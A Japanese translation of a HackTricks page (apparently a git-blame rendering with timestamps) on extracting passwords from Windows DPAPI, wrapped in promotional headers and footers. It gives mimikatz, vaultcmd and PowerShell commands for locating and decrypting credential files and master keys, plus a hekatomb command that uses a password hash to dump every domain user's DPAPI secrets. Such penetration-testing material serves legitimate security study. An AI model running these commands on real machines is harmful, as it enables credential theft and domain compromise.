2023-07-07 23:42:27 +00:00
# DPAPI - パスワードの抽出
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 01:39:37 +00:00
< summary > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > を使って、ゼロからヒーローまでAWSハッキングを学びましょう! < / summary >
2022-04-28 16:01:33 +00:00
2024-02-09 01:39:37 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見しましょう。独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式PEASS& HackTricksのスウェグ** ](https://peass.creator-spring.com )を手に入れましょう。
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私をフォローしてください 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)。
* **ハッキングトリックを共有するために、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ** ](https://github.com/carlospolop/hacktricks-cloud ) **にPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2022-10-25 15:56:49 +00:00
< figure > < img src = "https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt = "" > < figcaption > < / figcaption > < / figure >
2024-02-09 01:39:37 +00:00
[**RootedCON**](https://www.rootedcon.com/)は**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの1つです。**技術的知識の促進を使命**とするこの会議は、あらゆる分野のテクノロジーとサイバーセキュリティ専門家にとっての熱い出会いの場です。
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2023-07-07 23:42:27 +00:00
## DPAPIとは
2020-09-01 20:17:55 +00:00
2024-02-09 01:39:37 +00:00
データ保護API( DPAPI) は、主にWindowsオペレーティングシステム内で**非対称プライベートキーの対称暗号化**に使用され、ユーザーまたはシステムの秘密をエントロピーの重要なソースとして活用します。このアプローチにより、開発者はユーザーのログオン秘密から派生したキーを使用してデータを暗号化できるため、システムのドメイン認証秘密を使用する場合、開発者が暗号化キーの保護を管理する必要がなくなります。
2020-09-01 20:17:55 +00:00
2024-02-05 03:25:08 +00:00
### DPAPIによって保護されるデータ
2020-09-01 20:17:55 +00:00
2024-02-05 03:25:08 +00:00
DPAPIによって保護される個人データには、次のものがあります:
2020-09-01 20:17:55 +00:00
2024-02-08 03:59:37 +00:00
- Internet ExplorerおよびGoogle Chromeのパスワードおよび自動入力データ
2024-02-09 01:39:37 +00:00
- OutlookやWindows Mailなどのアプリケーションの電子メールや内部FTPアカウントのパスワード
2024-02-07 04:47:05 +00:00
- 共有フォルダ、リソース、ワイヤレスネットワーク、Windows Vaultのパスワード( 暗号化キーを含む)
2024-02-05 03:25:08 +00:00
- リモートデスクトップ接続、.NET Passport、およびさまざまな暗号化および認証目的のプライベートキーのパスワード
2024-02-08 03:59:37 +00:00
- Credential Managerで管理されるネットワークパスワード、Skype、MSNメッセンジャーなどのCryptProtectDataを使用するアプリケーションでの個人データ
2022-08-14 15:38:08 +00:00
```bash
# From cmd
vaultcmd /listcreds:"Windows Credentials" /all
# From mimikatz
mimikatz vault::list
```
2023-07-07 23:42:27 +00:00
## 資格情報ファイル
2022-08-14 15:38:08 +00:00
2024-02-05 03:25:08 +00:00
**保護された資格情報ファイル**は次の場所にある可能性があります:
2022-08-14 15:38:08 +00:00
```
dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
```
2024-02-09 01:39:37 +00:00
```
mimikatz `dpapi::cred` を使用して資格情報情報を取得し、応答には暗号化されたデータと guidMasterKey などの興味深い情報が含まれています。
```
2022-08-14 15:38:08 +00:00
```bash
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\28350839752B38B238E5D56FDD7891A7
[...]
guidMasterKey : {3e90dd9e-f901-40a1-b691-84d7f647b8fe}
[...]
pbData : b8f619[...snip...]b493fe
[..]
```
2024-02-07 04:47:05 +00:00
次のように、適切な `/masterkey` を使用して **mimikatz module** `dpapi::cred` を使って復号化することができます:
2022-08-14 15:38:08 +00:00
```
dpapi::cred /in:C:\path\to\encrypted\file /masterkey:< MASTERKEY >
```
2023-07-07 23:42:27 +00:00
## マスターキー
2022-08-14 15:38:08 +00:00
2024-02-08 03:59:37 +00:00
ユーザーのRSAキーを暗号化するために使用されるDPAPIキーは、`%APPDATA%\Microsoft\Protect\{SID}`ディレクトリに格納されています。ここで、{SID}はそのユーザーの[**セキュリティ識別子**](https://en.wikipedia.org/wiki/Security_Identifier)です。**DPAPIキーは、ユーザーのプライベートキーを保護するマスターキーと同じファイルに格納されています**。通常、これはランダムな64バイトのデータです。( このディレクトリは保護されているため、cmdから`dir`を使用してリストすることはできませんが、PowerShellからリストすることができます) 。
2020-09-01 22:47:55 +00:00
```bash
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
```
2024-02-07 04:47:05 +00:00
これはユーザーの一連のマスターキーが見えるようになります:
2020-09-01 22:47:55 +00:00
2022-12-24 12:04:26 +00:00
![](< .. / . . / . gitbook / assets / image ( 324 ) . png > )
2020-09-01 22:47:55 +00:00
2024-02-05 03:25:08 +00:00
通常、**各マスターキーは他のコンテンツを復号化できる暗号化された対称キー**です。したがって、**暗号化されたマスターキーを抽出**して、後でそれで**暗号化された他のコンテンツ**を**復号化**することが興味深いです。
2020-09-01 22:47:55 +00:00
2024-02-09 01:39:37 +00:00
### マスターキーの抽出と復号化
2020-09-01 22:47:55 +00:00
2024-02-05 03:25:08 +00:00
マスターキーを抽出して復号化する方法の例については、[https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#extracting-dpapi-backup-keys-with-domain-admin)を参照してください。
2020-09-01 22:47:55 +00:00
2022-10-03 22:09:31 +00:00
## SharpDPAPI
2024-02-09 01:39:37 +00:00
[SharpDPAPI ](https://github.com/GhostPack/SharpDPAPI#sharpdpapi-1 )は、[@gentilkiwi](https://twitter.com/gentilkiwi)の[Mimikatz](https://github.com/gentilkiwi/mimikatz/)プロジェクトからのDPAPI機能のC#ポートです。
2022-10-03 22:09:31 +00:00
2022-09-18 11:34:31 +00:00
## HEKATOMB
2024-02-09 01:39:37 +00:00
[**HEKATOMB** ](https://github.com/Processus-Thief/HEKATOMB )は、LDAPディレクトリからすべてのユーザーとコンピュータを抽出し、RPCを介してドメインコントローラーバックアップキーを抽出するツールです。スクリプトはすべてのコンピュータのIPアドレスを解決し、すべてのユーザーのDPAPIブロブを取得し、ドメインバックアップキーですべてを復号化します。
2022-09-18 11:34:31 +00:00
2022-09-30 10:27:15 +00:00
`python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp`
2022-09-18 11:34:31 +00:00
2024-02-09 01:39:37 +00:00
LDAPから抽出されたコンピュータリストを使用すると、それらを事前に知らなくてもすべてのサブネットワークを見つけることができます!
2022-09-18 11:34:31 +00:00
2024-02-07 04:47:05 +00:00
"ドメイン管理者権限だけでは不十分です。すべてをハックしましょう。"
2022-09-18 11:34:31 +00:00
2022-08-14 15:38:08 +00:00
## DonPAPI
2021-11-07 12:15:02 +00:00
2024-02-05 03:25:08 +00:00
[**DonPAPI** ](https://github.com/login-securite/DonPAPI )は、DPAPIで保護されたシークレットを自動的にダンプできます。
2021-11-07 12:15:02 +00:00
2023-07-07 23:42:27 +00:00
## 参考文献
2020-09-01 22:47:55 +00:00
2021-10-18 11:21:18 +00:00
* [https://www.passcape.com/index.php?section=docsys\&cmd=details\&id=28#13 ](https://www.passcape.com/index.php?section=docsys\&cmd=details\&id=28#13 )
2020-09-01 22:47:55 +00:00
* [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++ ](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c )
2022-04-28 16:01:33 +00:00
2022-10-25 15:56:49 +00:00
< figure > < img src = "https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt = "" > < figcaption > < / figcaption > < / figure >
2024-02-09 01:39:37 +00:00
[**RootedCON** ](https://www.rootedcon.com/ )は、**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**で最も重要なイベントの1つです。**技術知識の促進を使命**とするこの会議は、あらゆる分野のテクノロジーとサイバーセキュリティ専門家にとっての活発な交流の場です。
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 01:39:37 +00:00
< summary > < strong > ゼロからヒーローまでのAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-08 03:59:37 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけましょう
2024-02-09 01:39:37 +00:00
* [**公式PEASS& HackTricksスウェグ** ](https://peass.creator-spring.com )を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/)Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するために** [**hacktricksリポジトリ** ](https://github.com/carlospolop/hacktricks ) **と** [**hacktricks-cloudリポジトリ** ](https://github.com/carlospolop/hacktricks-cloud ) **にPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >